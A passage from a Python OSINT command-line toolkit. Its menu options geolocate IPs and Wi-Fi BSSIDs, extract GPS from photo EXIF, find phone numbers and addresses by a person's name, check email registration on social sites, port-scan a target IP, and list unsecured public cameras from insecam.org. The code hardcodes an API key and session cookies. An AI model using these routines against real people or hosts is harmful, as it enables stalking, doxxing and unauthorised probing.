924 | target_ip = input(f"{White}[{Blue}+{White}] - Enter Target IP : {Blue}") 925 | 926 | print(f"{White}Getting info...") 927 | time.sleep(3) 928 | print(f"[ Get info for {Blue}{target_ip} {Green}✓{White} ]\n") 929 | time.sleep(1) 930 | 931 | try: 932 | response = requests.get(url=f'http://ip-api.com/json/{target_ip}').json() 933 | 934 | table = Table(title="") 935 | table.add_column("Info", no_wrap=True) 936 | table.add_column("IP") 937 | table.add_row("IP", str(response.get(search))) 938 | ip_version = ipaddress.ip_address(target_ip) 939 | table.add_row("Version", str("IPV4" if ip_version.version == 4 else "IPV6")) 940 | hexhost = socket.inet_aton(target_ip) 941 | table.add_row("Binary Host", str(hexhost)) 942 | table.add_row("Hex Host", str(hexlify(hexhost))) 943 | ip_hostname = socket.gethostname() 944 | table.add_row("ISP", str(response.get('isp'))) 945 | table.add_row("Country", str(response.get('country'))) 946 | table.add_row("RegionName", str(response.get('regionName'))) 947 | table.add_row("City", str(response.get('city'))) 948 | table.add_row("Zip", str(response.get('zip'))) 949 | table.add_row("Lat", str(response.get('lat'))) 950 | table.add_row("Lon", str(response.get('lon'))) 951 | Console().print(table, justify="left") 952 | except requests.exceptions.ConnectionError: print(f"{Red}Please check your connection!") 953 | elif ip_osint_selections == "2" or ip_osint_selections == "02" or ip_osint_selections == "Your device" or ip_osint_selections == "YOUR DEVICE" or ip_osint_selections == "your device": 954 | device_host_name = socket.gethostname() 955 | device_ip = socket.gethostbyname(device_host_name) 956 | ip_version = ipaddress.ip_address(device_ip) 957 | 958 | table = Table(title=f"{White}") 959 | table.add_column("Info", no_wrap=True) 960 | table.add_column("Yor device") 961 | table.add_row("OS", str(platform.system())) 962 | table.add_row("OS release", str(platform.version())) 963 | table.add_row("Architecture", str(platform.architecture())) 964 | table.add_row("Processor", str(platform.processor())) 965 | table.add_row("Total, Physical cores", str(f"{psutil.cpu_count(logical=True)}, {psutil.cpu_count(logical=False)}")) 966 | cpufreq = psutil.cpu_freq() 967 | table.add_row("Max, Min, Current frequency", str(f"{cpufreq.max:.2f} MHz, {cpufreq.min:.2f} MHz, {cpufreq.current:.2f} MHz")) 968 | for i, percentage in enumerate(psutil.cpu_percent(percpu=True, interval=1)): table.add_row(f"Core {i}", str(f"{percentage}%")) 969 | table.add_row(f"Total CPU Usage", str(f"{psutil.cpu_percent()}%")) 970 | total, used, free = shutil.disk_usage("/") 971 | table.add_row("Total, Used, Free storage space", str(f"{total//(2**30)}GB, {used//(2**30)}GB, {free//(2**30)}GB")) 972 | table.add_row("Hostname", str(device_host_name)) 973 | table.add_row("IP", str(device_ip)) 974 | table.add_row("Version", str("IPV4" if ip_version.version == 4 else "IPV6")) 975 | hexhost = socket.inet_aton(device_ip) 976 | table.add_row("Binary Host", str(hexhost)) 977 | table.add_row("Hex Host", str(hexlify(hexhost))) 978 | try: ipv6_addr = str(socket.getaddrinfo(device_host_name, None, socket.AF_INET6)[0][4][0]) 979 | except socket.gaierror: ipv6_addr = "Unavailable" 980 | table.add_row("IPV6", ipv6_addr) 981 | Console().print(table, justify="left") 982 | elif ip_osint_selections == "99" or ip_osint_selections == "Back" or ip_osint_selections == "BACK" or ip_osint_selections == "back": main_menu() 983 | else: print(f"{Red}Please choose a correct option!") 984 | elif selection == "6" or selection == "06" or selection == "Networks OSINT" or selection == "NETWORKS OSINT" or selection == "networks osint": 985 | submenu3() 986 | user_input = input(f"Choose : {Blue}") 987 | 988 | if user_input == "1" or user_input == "01" or user_input == "Networks OSINT" or user_input == "NETWORKS OSINT" or user_input == "networks osint": 989 | print(f"{White}Getting info...") 990 | time.sleep(3) 991 | print(f"[ Get info for {Blue}networks {Green}✓{White} ]") 992 | time.sleep(1) 993 | 994 | def check_os(): 995 | os_name = platform.system() 996 | 997 | if os_name == "Windows": 998 | print(f"{Blue}") 999 | os.system("netsh wlan show interfaces & netsh wlan show networks & ipconfig") 1000 | print(f"{White}") 1001 | elif os_name == "Linux": 1002 | def get_distro_name(): 1003 | try: 1004 | output = subprocess.check_output("lsb_release -i", shell=True) 1005 | distro_name = output.decode().split(":")[1].strip().lower() 1006 | except BaseException as e: distro_name = None 1007 | return distro_name 1008 | distro_name = get_distro_name() 1009 | if "kali" in distro_name or "Mac OS" in os.environ: 1010 | print(f"{Blue}") 1011 | os.system("ifconfig") 1012 | print(f"{White}") 1013 | elif "parrot" in distro_name: 1014 | print(f"{Blue}") 1015 | os.system("ip address") 1016 | print(f"{White}") 1017 | elif "arch" in distro_name or "backbox" in distro_name: 1018 | print(f"{Blue}") 1019 | os.system("ip") 1020 | print(f"{White}") 1021 | elif os_name == "Darwin": 1022 | if "iSH" in os.environ or "termux" in os.environ: 1023 | print(f"{Blue}") 1024 | os.system("ip a") 1025 | print(f"{White}") 1026 | else: pass 1027 | else: print(f"{Red}OSINT cannot be done because your operating system is unknown!{White}") 1028 | print(check_os()) 1029 | elif user_input == "2" or user_input == "02" or user_input == "Show network operations" or user_input == "SHOW NETWORK OPERATIONS" or user_input == "show network operations": 1030 | print(f"{White}Extracting network operations...") 1031 | time.sleep(3) 1032 | print(f"\n[ Get {Blue}network operations {Green}✓{White} ]") 1033 | time.sleep(1) 1034 | 1035 | print(f"{Blue}") 1036 | os.system("netstat") 1037 | print(f"{White}") 1038 | elif user_input == "3" or user_input == "03" or user_input == "Extract The Location" or user_input == "EXTRACT THE LOCATION" or user_input == "extract The Location": 1039 | ___author___ = 'D4rkC00d3r' 1040 | 1041 | bssid = input(f"{White}[{Blue}+{White}] Enter the bssid target (ex: 00:0C:42:1F:65:E9) : {Blue}") 1042 | 1043 | api_uri = "https://api.mylnikov.org/geolocation/wifi?v=1.1&data=open&bssid=" 1044 | map_url = "http://find-wifi.mylnikov.org/#" 1045 | 1046 | def show_map(): 1047 | while True: 1048 | show_map = input(f"Show the map? ({Blue}Y{White}/{Blue}N{White}) {Blue}") 1049 | if show_map == "Y" or show_map == "y" or show_map == "Yes" or show_map == "yes": 1050 | webbrowser.open(map_url+bssid) 1051 | return 1052 | else: break 1053 | 1054 | def results(): 1055 | if 'desc' in data: print(data['desc']) 1056 | else: 1057 | table = Table(title="") 1058 | table.add_column("Info", no_wrap=True) 1059 | table.add_column("Network") 1060 | table.add_row("Lat", data['data']['lat']) 1061 | table.add_row("Lon", data['data']['lon']) 1062 | table.add_row("Meter accuracy",data['data']['range'] ) 1063 | Console().print(table, justify="left") 1064 | show_map() 1065 | elif user_input == "99" or user_input == "Back" or user_input == "BACK" or user_input == "back": main_menu() 1066 | else: print(f"{Red}Please choose a correct option!") 1067 | elif selection == "7" or selection == "07" or selection == "Images OSINT" or selection == "IMAGES OSINT" or selection == "images osint": 1068 | class images: 1069 | def __init__(self): 1070 | try: 1071 | self.img_name = str(input(f"{White}[{Blue}+{White}] Enter the img name or path : {Blue}")).replace(" ", "") 1072 | self.image = Image.open(self.img_name) 1073 | self.img_read = cv2.imread(self.img_name) 1074 | except BaseException as msg: print(f"{Red}E: {msg}") 1075 | 1076 | def handle_exif_data(self): 1077 | exif_data = self.image._getexif() 1078 | if exif_data is not None: 1079 | for tag, value in exif_data.items(): 1080 | tag_name = TAGS.get(tag, tag) 1081 | if tag_name == "DateTimeOriginal": 1082 | return value 1083 | return None 1084 | 1085 | def DeviceInfo(self): 1086 | try: exif = self.image._getexif() 1087 | except: exit() 1088 | if self.image._getexif() is None: exit() 1089 | else: 1090 | for k, v in self.image._getexif().items(): 1091 | decoded = TAGS.get(k, k) 1092 | if decoded == "MakerNote": pass 1093 | elif decoded == "GPSInfo": self.GPSInfo = v 1094 | 1095 | def GetGeoposition(self): 1096 | self.DeviceInfo() 1097 | gp = self.GPSInfo 1098 | if self.GPSInfo is None: 1099 | return None, None 1100 | 1101 | gpsinfo = {} 1102 | for k in gp.keys(): 1103 | decoded = GPSTAGS.get(k, k) 1104 | gpsinfo[decoded] = gp[k] 1105 | lat = None 1106 | lon = None 1107 | gps_latitude = gpsinfo.get("GPSLatitude") 1108 | gps_latitude_ref = gpsinfo.get("GPSLatitudeRef") 1109 | gps_longitude = gpsinfo.get("GPSLongitude") 1110 | gps_longitude_ref = gpsinfo.get("GPSLongitudeRef") 1111 | if gps_latitude and gps_latitude_ref and gps_longitude and gps_longitude_ref: 1112 | lat = self._convert_to_degress(gps_latitude) 1113 | if gps_latitude_ref != 'N': lat = 0 - lat 1114 | lon = self._convert_to_degress(gps_longitude) 1115 | if gps_longitude_ref != 'E': lon = 0 - lon 1116 | self.lat = lat 1117 | self.lon = lon 1118 | return True 1119 | 1120 | def LocationInfo(self): 1121 | if not self.GetGeoposition(): pass 1122 | else: 1123 | headers = { 'User-Agent':'Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1' } 1124 | response = requests.get(f'https://api.opencagedata.com/geocode/v1/json?q={self.lat}+{self.lon}&key=03c48dae07364cabb7f121d8c1519492&no_annotations=1&language=en', headers=headers) 1125 | if "country" not in response.text: pass 1126 | try: 1127 | console = Console() 1128 | table = Table(title=f"{White}") 1129 | table.add_column("Pic", no_wrap=True) 1130 | table.add_column("Info") 1131 | 1132 | for info in response.json()['results']: 1133 | date_taken = self.handle_exif_data() 1134 | if date_taken is not None: table.add_row("Imagine time", date_taken) 1135 | pixels = self.img_read.size 1136 | dim = self.img_read.shape 1137 | table.add_row("Pixels", str(pixels)) 1138 | table.add_row("Dimensions", str(dim)) 1139 | components = info['components'] 1140 | for key, value in components.items(): 1141 | if key not in ['ISO_3166-1_alpha-2', 'ISO_3166-1_alpha-3', 'ISO_3166-2']: 1142 | table.add_row(key, str(value)) 1143 | table.add_row("GoogleMap link", f"http://www.google.com/maps/place/{self.lat},{self.lon}") 1144 | console.print(table) 1145 | except: pass 1146 | img = images() 1147 | img.LocationInfo() 1148 | elif selection == "8" or selection == "08" or selection == "PhoneNumbers OSINT" or selection == "PHONENUMBERS OSINT" or selection == "phonenumber osint": 1149 | submenu2() 1150 | user_input = input(f"Choose : {Blue}") 1151 | 1152 | if user_input == "1" or user_input == "01" or user_input == "PhoneNumber OSINT" or user_input == "PHONENUMBER OSINT" or user_input == "phonenumber osint": 1153 | PhoneNumber = input(f"{White}[{Blue}+{White}] Enter the phonenumber (ex: +966500000000) : {Blue}") 1154 | 1155 | print(f"{White}Getting info...") 1156 | time.sleep(3) 1157 | print(f"{White}[ Get info for {Blue}{PhoneNumber} {Green}✓{White} ]\n") 1158 | time.sleep(1) 1159 | 1160 | try: parse = phonenumbers.parse(PhoneNumber) 1161 | except: print(f"{Red}Please add countrycode!{White}") 1162 | 1163 | region = geocoder.description_for_number(parse, 'en') 1164 | tiimezone = timezone.time_zones_for_number(parse) 1165 | isp = carrier.name_for_number(parse, 'en') 1166 | 1167 | table = Table(title="") 1168 | table.add_column("Info", no_wrap=True) 1169 | table.add_column("PhoneNumber") 1170 | table.add_row("Location", str(region)) 1171 | table.add_row("TimeZone", str(tiimezone)) 1172 | table.add_row("ISP", str(isp)) 1173 | Console().print(table, justify="left") 1174 | elif user_input == "2" or user_input == "02" or user_input == "Search for the owner of the number by name" or user_input == "SEARCH FOR THE OWNER OF THE NUM BY NAME" or user_input == "search for the owner of the num by name": 1175 | i = 1 1176 | for country in pycountry.countries: 1177 | print(f"{White}[{Blue}{str(i).zfill(3)}{White}] - {country.name} [{country.alpha_2}]") 1178 | i += 1 1179 | 1180 | country = input(f"{White}[{Blue}+{White}] Enter the countrycode (ex: SA) : {Blue}") 1181 | 1182 | country_list = [ 1183 | "AF", "AX", "AL", "DZ", "AS", "AD", "AO", "AI", "AQ", "AG", 1184 | "AR", "AM", "AW", "AU", "AT", "AZ", "BS", "BH", "BD", "BB", 1185 | "BY", "BE", "BZ", "BJ", "BM", "BT", "BO", "BQ", "BA", "BW", 1186 | "BV", "BR", "IO", "BN", "BG", "BF", "BI", "CV", "KH", "CM", 1187 | "CA", "KY", "CF", "TD", "CL", "CN", "CX", "CC", "CO", "KM", 1188 | "CD", "CG", "CK", "CR", "CI", "HR", "CU", "CW", "CY", "CZ", 1189 | "DK", "DJ", "DM", "DO", "EC", "EG", "SV", "GQ", "ER", "EE", 1190 | "SZ", "ET", "FK", "FO", "FJ", "FI", "FR", "GF", "PF", "TF", 1191 | "GA", "GM", "GE", "DE", "GH", "GI", "GR", "GL", "GD", "GP", 1192 | "GU", "GT", "GG", "GN", "GW", "GY", "HT", "HM", "VA", "HN", 1193 | "HK", "HU", "IS", "IN", "ID", "IR", "IQ", "IE", "IM", "IL", 1194 | "IT", "JM", "JP", "JE", "JO", "KZ", "KE", "KI", "KP", "KR", 1195 | "KW", "KG", "LA", "LV", "LB", "LS", "LR", "LY", "LI", "LT", 1196 | "LU", "MO", "MG", "MW", "MY", "MV", "ML", "MT", "MH", "MQ", 1197 | "MR", "MU", "YT", "MX", "FM", "MD", "MC", "MN", "ME", "MS", 1198 | "MA", "MZ", "MM", "NA", "NR", "NP", "NL", "NC", "NZ", "NI", 1199 | "NE", "NG", "NU", "NF", "MK", "MP", "NO", "OM", "PK", "PW", 1200 | "PS", "PA", "PG", "PY", "PE", "PH", "PN", "PL", "PT", "PR", 1201 | "QA", "RE", "RO", "RU", "RW", "BL", "SH", "KN", "LC", "MF", 1202 | "PM", "VC", "WS", "SM", "ST", "SA", "SN", "RS", "SC", "SL", 1203 | "SG", "SK", "SX", "SI", "SB", "SO", "ZA", "GS", "SS", "ES", 1204 | "LK", "SD", "SR", "SJ", "SE", "CH", "SY", "TW", "TJ", "TZ", 1205 | "TH", "TL", "TG", "TK", "TO", "TT", "TN", "TR", "TM", "TC", 1206 | "TV", "UG", "UA", "AE", "GB", "US", "UM", "UY", "UZ", "VU", 1207 | "VE", "VN", "VG", "VI", "WF", "EH", "YE", "ZM", "ZW"] 1208 | 1209 | if country in country_list: 1210 | name = input(f"{White}[{Blue}+{White}] Enter the target name : {Blue}") 1211 | 1212 | print(f"{White}Searching...") 1213 | time.sleep(3) 1214 | print(f"{White}[ Search for {Blue}{name} {Green}✓{White} ]\n") 1215 | time.sleep(1) 1216 | 1217 | url = f"https://caller-id.saedhamdan.com/index.php/UserManagement/search_number?country_code={country}&name={name}" 1218 | r = requests.get(url, verify=False) 1219 | data = r.json() 1220 | 1221 | if "result" in r.text: 1222 | if len(data['result']) > 0: 1223 | print(f"-"*40) 1224 | i = 1 1225 | for numbers in data['result']: 1226 | number = numbers['number'] 1227 | name = numbers['name'] 1228 | country_code = numbers['country_code'] 1229 | address = numbers['address'] 1230 | 1231 | print(f"""{Blue}{i} {White}{{ 1232 | {White}[{Blue}-{White}] Name : {Blue}{name} 1233 | {White}[{Blue}-{White}] Number : {Blue}{number} 1234 | {White}[{Blue}-{White}] CountryCode : {Blue}{country_code} 1235 | {White}[{Blue}-{White}] Address : {Blue}{address} {White} }}""") 1236 | i += 1 1237 | elif "No recourd found" in r.text: print(f"{Red}nothing found for this name!") 1238 | else: print(f"{Red}your country not in the list!") 1239 | elif user_input == "99" or user_input == "Back" or user_input == "BACK" or user_input == "back": main_menu() 1240 | else: print(f"{Red}Please choose a correct option!") 1241 | elif selection == "9" or selection == "09" or selection == "Emails OSINT" or selection == "EMAILS OSINT" or selection == "emails osint": 1242 | email = input(f"{White}[{Blue}+{White}] Enter the email target : {Blue}") 1243 | 1244 | print(f"{White}Checking...") 1245 | time.sleep(3) 1246 | print(f"{White}[ Check for {Blue}{email} {Green}✓{White} ]\n") 1247 | time.sleep(1) 1248 | 1249 | checker = Valid.Facebook(email) 1250 | if checker == True: print(f"{White}[{Green}✓{White}] FaceBook Found") 1251 | else: print(f"{White}[{Red}X{White}] FaceBook Not Found") 1252 | time.sleep(0.5) 1253 | url = "https://www.tiktok.com/passport/web/user/check_email_registered?shark_extra=%7B%22aid%22%3A1459%2C%22app_name%22%3A%22Tik_Tok_Login%22%2C%22app_language%22%3A%22en%22%2C%22device_platform%22%3A%22web_mobile%22%2C%22region%22%3A%22SA%22%2C%22os%22%3A%22ios%22%2C%22referer%22%3A%22https%3A%2F%2Fwww.tiktok.com%2Fprofile%22%2C%22root_referer%22%3A%22https%3A%2F%2Fwww.google.com%22%2C%22cookie_enabled%22%3Atrue%2C%22screen_width%22%3A390%2C%22screen_height%22%3A844%2C%22browser_language%22%3A%22en-us%22%2C%22browser_platform%22%3A%22iPhone%22%2C%22browser_name%22%3A%22Mozilla%22%2C%22browser_version%22%3A%225.0%20%28iPhone%3B%20CPU%20iPhone%20OS%2014_4%20like%20Mac%20OS%20X%29%20AppleWebKit%2F605.1.15%20%28KHTML%2C%20like%20Gecko%29%20Version%2F14.0.3%20Mobile%2F15E148%20Safari%2F604.1%22%2C%22browser_online%22%3Atrue%2C%22timezone_name%22%3A%22Asia%2FRiyadh%22%2C%22is_page_visible%22%3Atrue%2C%22focus_state%22%3Atrue%2C%22is_fullscreen%22%3Afalse%2C%22history_len%22%3A17%2C%22battery_info%22%3A%7B%7D%7D&msToken=vPgBDLGXZNEf56bl_V4J6muu5nAYCQi5dA6zj49IuWrw2DwDUZELsX2wz2_2ZYtzkbUF9UyblyjQTsIDI5cclvJQ6sZA-lHqzKS1gLIJD9M6LDBgII0nxKqCfwwVstZxhpppXA==&X-Bogus=DFSzsIVLC8A-dJf6SXgssmuyRsO1&_signature=_02B4Z6wo00001dTdX3QAAIDBDn9.7WbolA3U3FvAABfU8c" 1254 | data = (f"email={email}&aid=1459&language=en&account_sdk_source=web®ion=SA") 1255 | header = {"User-Agent":"Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"} 1256 | r = requests.post(url, headers=header, data=data) 1257 | if '{"is_registered":1}' in r.text: print(f"{White}[{Green}✓{White}] TikTok Found") 1258 | else: print(f"{White}[{Red}X{White}] TikTok Not Found") 1259 | time.sleep(0.5) 1260 | url = f"https://api.tellonym.me/accounts/check?email={email}&limit=13" 1261 | headers = {"User-Agent":"Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"} 1262 | r = requests.get(url, headers=headers) 1263 | if '"EMAIL_ALREADY_IN_USE"' in r.text: print(f"{White}[{Green}✓{White}] Tellonym Found") 1264 | else: print(f"{White}[{Red}X{White}] Tellonym Not Found") 1265 | elif selection == "10" or selection == "Search Engine" or selection == "SEARCH ENGINE" or selection == "Search engine": 1266 | searchh = input(f"{White}[{Blue}+{White}] Enter the thing to search for : {Blue}") 1267 | result = input(f"{White}[{Blue}+{White}] Enter the num of results : {Blue}") 1268 | 1269 | print(f"{White}Searching...") 1270 | time.sleep(3) 1271 | print(f"{White}[ Search for {Blue}{searchh} {Green}✓{White} ]\n") 1272 | time.sleep(1) 1273 | 1274 | with open("ESR.txt", "at", encoding="utf-8") as f: 1275 | for url in search(searchh, tld="co.in", num=int(result), stop=int(result)): 1276 | page = requests.get(url) 1277 | soup = BeautifulSoup(page.content, 'html.parser') 1278 | 1279 | title = soup.title.string if soup.title else 'No title' 1280 | text = ' '.join(p.get_text() for p in soup.find_all('p')) 1281 | 1282 | f.write(f"""[-] Title : {title} 1283 | [-] URL : {url} 1284 | [-] Text : {text}\n\n""") 1285 | 1286 | print(f"{White}[{Green}✓{White}] The results has been saved in {Blue}{ os.getcwd()}\ESR.txt{White}") 1287 | elif selection == "11" or selection == "Ports Scan" or selection == "PORTS SCAN" or selection == "ports scan": 1288 | def check_port(ip_input, port): 1289 | with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: 1290 | s.settimeout(1) 1291 | if s.connect_ex((ip_input, port)) == 0: return port 1292 | 1293 | def scan_ports(ip_input, num_ports): 1294 | open_ports = [] 1295 | 1296 | print(f"{White}Scanning...") 1297 | 1298 | with concurrent.futures.ThreadPoolExecutor(max_workers=100) as executor: 1299 | future_to_port = {executor.submit(check_port, ip_input, port): port for port in range(1, num_ports+1)} 1300 | for future in concurrent.futures.as_completed(future_to_port): 1301 | result = future.result() 1302 | if result is not None: open_ports.append(result) 1303 | return sorted(open_ports) 1304 | 1305 | ip_input = input(f"{White}[{Blue}+{White}] Enter the target IP : {Blue}") 1306 | num_ports = int(input(f"{White}[{Blue}+{White}] Entet the num of ports (1~65535) : {Blue}")) 1307 | open_ports = scan_ports(ip_input, num_ports) 1308 | 1309 | if open_ports: 1310 | print(f"{White}[ Scan for {Blue}{ip_input} {White}Ports {Green}✓{White} ]\n") 1311 | time.sleep(1) 1312 | 1313 | for port in open_ports: 1314 | print(f"{White}[{Green}✓{White}] Port {Yellow}{port} {White}is open\n") 1315 | time.sleep(1) 1316 | else: print(f"{Yellow}There are no open ports!{White}") 1317 | 1318 | print(f"{White}[{Green}✓{White}] {Yellow}{num_ports} {White}Ports were scanned") 1319 | 1320 | print(f"{White}[{Green}✓{White}] Open ports : {Yellow}{open_ports}{White}") 1321 | elif selection == "12" or selection == "Deep & Dark Web" or selection == "DEEP & DARK WEB" or selection == "deep & dark web": 1322 | table = Table(title=f"The most famous search engines in the {Red}Deep & Dark Web\n{White}") 1323 | table.add_column("General Info", no_wrap=True) 1324 | table.add_column("Clients") 1325 | table.add_column("Discovery") 1326 | table.add_column("TOR Search") 1327 | table.add_column("TOR Directories") 1328 | table.add_row("Reddit Deep Web", "TOR Download", "OnionScan", "Onion Cab", "Hidden Wiki") 1329 | table.add_row("Reddit Onions", "Freenet Project", "TorBot", "OnionLink", "Core.onion") 1330 | table.add_row("Reddit Darknet", "I2P Anonymous Network", "Tor Scan", "Candle", "Tor2web") 1331 | table.add_row("-", "-", "Onioff", "Not Evil", "Web O Proxy") 1332 | table.add_row("-", "-", "Hunchly Hidden Services Report", "Tor66", "IACA Dark Web Investigation Support") 1333 | table.add_row("-", "-", "docker-onion-nmap", "dark.fail", "-") 1334 | table.add_row("-", "-", "Onion Investigator", "Ahmia", "-") 1335 | Console().print(table, justify="left") 1336 | elif selection == "13" or selection == "Monitor Cameras" or selection == "MONITPR CAMERAS" or selection == "monitor cameras": 1337 | submenu4() 1338 | 1339 | user_input = input(f"Choose : {Blue}") 1340 | 1341 | if user_input == "1" or user_input == "Cameras around the world" or user_input == "CAMERAS AROUND THE WORLD" or user_input == "cameras around the world": 1342 | def monitor_cameras_world(): 1343 | json = requests.get('http://www.insecam.org/en/jsoncountries/', headers={ 1344 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 1345 | 'Accept-Encoding': 'gzip, deflate', 1346 | 'Accept-Language': 'ar,en-US;q=0.9,en;q=0.8', 1347 | 'Cache-Control': 'max-age=0', 1348 | 'Connection': 'keep-alive', 1349 | 'Cookie': '_ga=GA1.1.1125454972.1667225132; __gads=ID=d4a85cd85ce2f539-223503ca84d60066:T=1667225145:RT=1667225145:S=ALNI_MZ4MsyAr2w4HGK_wzfy90dxfdFtng; __gpi=UID=00000b196cc62113:T=1667225145:RT=1667225145:S=ALNI_MZx4MzjOSuSbqPbJFNskKGifhu5zw; _ga_F7ZM4QYVCB=GS1.1.1667225132.1.1.1667226059.0.0.0', 1350 | 'Host': 'www.insecam.org', 1351 | 'Upgrade-Insecure-Requests': '1', 1352 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36' }).json()['countries'] 1353 | 1354 | value = [] 1355 | counter = 1 1356 | for i in json: 1357 | print(f"{White}[{Blue}{counter}{White}] {json[i]['country']} [{i}] {Yellow}{ {json[i]['count']} }{White}") 1358 | value.append(i) 1359 | counter += 1 1360 | 1361 | cc_choose = input(f"{White}Enter the countrycode : {Blue}") 1362 | if cc_choose in value: 1363 | r = requests.get('http://www.insecam.org/en/bycountry/'+cc_choose+'/', headers={ 1364 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 1365 | 'Accept-Encoding': 'gzip, deflate', 1366 | 'Accept-Language': 'ar,en-US;q=0.9,en;q=0.8', 1367 | 'Cache-Control': 'max-age=0', 1368 | 'Connection': 'keep-alive', 1369 | 'Cookie': '_ga=GA1.1.1125454972.1667225132; __gads=ID=d4a85cd85ce2f539-223503ca84d60066:T=1667225145:RT=1667225145:S=ALNI_MZ4MsyAr2w4HGK_wzfy90dxfdFtng; __gpi=UID=00000b196cc62113:T=1667225145:RT=1667225145:S=ALNI_MZx4MzjOSuSbqPbJFNskKGifhu5zw; _ga_F7ZM4QYVCB=GS1.1.1667225132.1.1.1667226059.0.0.0', 1370 | 'Host': 'www.insecam.org', 1371 | 'Upgrade-Insecure-Requests': '1', 1372 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36' }).text 1373 | s = r.split('pagenavigator("?page=",')[1] 1374 | next = s.split(',')[0] 1375 | next = int(next) 1376 | 1377 | S = r.split('"thumbnail-item__wrap" href="') 1378 | counter = 1 1379 | for i in S: 1380 | Y = i.split('" ')[0] 1381 | if 'html' in Y: pass 1382 | else: 1383 | url = f'http://www.insecam.org{Y}' 1384 | print(f"{White}[{Blue}{counter}{White}] {Yellow}{url}") 1385 | counter += 1 1386 | 1387 | info = requests.get(url, headers={ 1388 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 1389 | 'Accept-Encoding': 'gzip, deflate', 1390 | 'Accept-Language': 'ar,en-US;q=0.9,en;q=0.8', 1391 | 'Cache-Control': 'max-age=0', 1392 | 'Connection': 'keep-alive', 1393 | 'Cookie': '_ga=GA1.1.1125454972.1667225132; __gads=ID=d4a85cd85ce2f539-223503ca84d60066:T=1667225145:RT=1667225145:S=ALNI_MZ4MsyAr2w4HGK_wzfy90dxfdFtng; __gpi=UID=00000b196cc62113:T=1667225145:RT=1667225145:S=ALNI_MZx4MzjOSuSbqPbJFNskKGifhu5zw; _ga_F7ZM4QYVCB=GS1.1.1667225132.1.1.1667226059.0.0.0', 1394 | 'Host': 'www.insecam.org', 1395 | 'Upgrade-Insecure-Requests': '1', 1396 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36' }).text 1397 | 1398 | for i in range(2, next): 1399 | print(i) 1400 | url = 'http://www.insecam.org/en/bycountry/RS/?page='+str(i) 1401 | r = requests.get(url, headers={ 1402 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 1403 | 'Accept-Encoding': 'gzip, deflate', 1404 | 'Accept-Language': 'ar,en-US;q=0.9,en;q=0.8', 1405 | 'Cache-Control': 'max-age=0', 1406 | 'Connection': 'keep-alive', 1407 | 'Cookie': '_ga=GA1.1.1125454972.1667225132; __gads=ID=d4a85cd85ce2f539-223503ca84d60066:T=1667225145:RT=1667225145:S=ALNI_MZ4MsyAr2w4HGK_wzfy90dxfdFtng; __gpi=UID=00000b196cc62113:T=1667225145:RT=1667225145:S=ALNI_MZx4MzjOSuSbqPbJFNskKGifhu5zw; _ga_F7ZM4QYVCB=GS1.1.1667225132.1.1.1667226059.0.0.0', 1408 | 'Host': 'www.insecam.org', 1409 | 'Upgrade-Insecure-Requests': '1', 1410 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36' }).text 1411 | 1412 | S = r.split('"thumbnail-item__wrap" href="') 1413 | counter = 1 1414 | for i in S: 1415 | Y = i.split('" ')[0] 1416 | if 'html' in Y: pass 1417 | else: 1418 | url = f'http://www.insecam.org{Y}' 1419 | print(f"{White}[{Blue}{counter}{White}] {Yellow}{url}") 1420 | counter += 1 1421 | else: 1422 | print(f"{Red}CountryCode not found!{White}") 1423 | print(f"\n") 1424 | time.sleep(3) 1425 | monitor_cameras_world() 1426 | monitor_cameras_world() 1427 | elif user_input == "2" or user_input == "Cameras of places" or user_input == "CAMERAS OF PLACES" or user_input == "cameras of places": 1428 | def monitor_cameras_places(): 1429 | json = requests.get('http://www.insecam.org/en/jsontags/', headers={ 1430 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 1431 | 'Accept-Encoding': 'gzip, deflate', 1432 | 'Accept-Language': 'ar,en-US;q=0.9,en;q=0.8', 1433 | 'Cache-Control': 'max-age=0', 1434 | 'Connection': 'keep-alive', 1435 | 'Cookie': '_ga=GA1.1.1125454972.1667225132; __gads=ID=d4a85cd85ce2f539-223503ca84d60066:T=1667225145:RT=1667225145:S=ALNI_MZ4MsyAr2w4HGK_wzfy90dxfdFtng; __gpi=UID=00000b196cc62113:T=1667225145:RT=1667225145:S=ALNI_MZx4MzjOSuSbqPbJFNskKGifhu5zw; _ga_F7ZM4QYVCB=GS1.1.1667225132.1.1.1667226059.0.0.0', 1436 | 'Host': 'www.insecam.org', 1437 | 'Upgrade-Insecure-Requests': '1', 1438 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36' }).json()['tags'] 1439 | 1440 | counter = 1 1441 | jsontags = [] 1442 | for i in json: 1443 | 